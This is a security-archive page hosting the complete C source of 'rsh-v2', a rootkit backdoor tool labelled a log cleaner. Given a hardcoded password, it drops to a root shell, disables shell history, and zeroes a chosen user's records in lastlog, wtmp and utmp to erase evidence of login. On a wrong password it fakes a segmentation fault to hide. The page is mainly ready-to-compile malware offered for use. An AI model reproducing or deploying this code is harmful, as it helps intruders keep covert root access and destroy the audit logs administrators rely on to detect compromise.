exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

rsh-v2.c

rsh-v2.c
Posted Oct 31, 2005
Authored by rotor | Site c1zc0.com

Unix log cleaner that also checks to see if root is logged in.

tags | tool, root, rootkit
systems | unix
SHA-256 | 5e6f13f781904f0f4c789db79cf90ca99edbd035180408985a46970a0d8b74ce

rsh-v2.c

Change Mirror Download
/*
rsh-v2 rootshell by rotor http://www.c1zc0.com
irc.efnet.org #c1zc0
usage: ./rshv2 <pass> <user>
*/

#include <stdio.h>
#include <string.h>
#include <utmp.h>
#include <unistd.h>
#include <fcntl.h>
#include <lastlog.h>
#include <pwd.h>
#include <sys/utsname.h>

#define PASS "c1zk0"

#define _PATH_LASTLOG "/var/log/lastlog"
#define _WTMP_PATH "/var/log/wtmp"
#define _UTMP_PATH "/var/run/utmp"

int clean_last(char *path, char *user);
int wtmp_clean(char *path, char *user);
void chkr();

int main(int argc, char **argv[])
{
char *pass = argv[1];
char *pazz = PASS;
struct utsname u;
uname(&u);

if(argc < 1){
printf("Segmentation fault (core dumped)\n");
exit(0);
}
if(strcmp(pass, pazz)) {
printf("Segmentation fault (core dumped)\n");
exit(0);
} else {
setuid(0);
setuid(0);
unsetenv("PS1");
unsetenv("HISTFILE");
printf("Cleaning lastlog!\n");
clean_last(_PATH_LASTLOG, argv[2]);
printf("Cleaning WTMP\n");
wtmp_clean(_WTMP_PATH, argv[2]);
printf("Cleaning UTMP\n");
wtmp_clean(_UTMP_PATH, argv[2]);
printf("Checking for root logged in\n");
chkr();
printf("System name: %s, Node Name: %s\n", u.sysname, u.nodename);
printf("Release: %s, Version: %s\n", u.release, u.version);
execl("/bin/bash", "sh", NULL);
}
return 0;
}

int clean_last(char *path, char *user) {
FILE *lastlog_file;
struct passwd *pwd;
struct lastlog lastlog_tmp;
int count=0;

if((lastlog_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

if ((pwd = getpwnam(user)) == NULL) {
printf("user %s not found\n", user);
return 0;
}

fseek(lastlog_file, (long)(pwd->pw_uid*sizeof(lastlog_tmp)), SEEK_SET);
bzero((char *)&lastlog_tmp, sizeof(lastlog_tmp));
fwrite((char *)&lastlog_tmp, sizeof(lastlog_tmp), 1, lastlog_file);

fclose(lastlog_file);

printf("%s cleaned!\n", path);

}

int wtmp_clean(char *path, char *user)
{
FILE *uwtmp_file;
struct utmp uwtmp_tmp;
int count=0;

if((uwtmp_file = fopen(path, "r+")) == NULL) {
printf("failed to open file %s\n", path);
return 0;
}

while(fread((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file) > 0) {
if(strcmp(uwtmp_tmp.ut_name, user) ==0) {
fseek(uwtmp_file, -sizeof(uwtmp_tmp), SEEK_CUR);
bzero(&uwtmp_tmp, sizeof(uwtmp_tmp));
fwrite((char *)&uwtmp_tmp, sizeof(uwtmp_tmp), 1, uwtmp_file);
count++;
}
}

fclose(uwtmp_file);

if(count == 0) {
printf("user %s not found\n", user, path);
}

else printf("%s cleaned!\n", path);

}

void chkr()
{
struct utmp *entry;

int logincount=0, rootcount=0;
setutent();
while ((entry = getutent())!=NULL)
{
if(entry->ut_type != USER_PROCESS)
continue;
logincount++;

if(!strcmp(entry->ut_user, "root"));
{
printf("Caution> root is logged in on %s!\n", entry->ut_line);
rootcount++;
}
}
printf("-> %d user(s) logged in, %d root login(s)\n", logincount, rootcount);
endutent();


}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close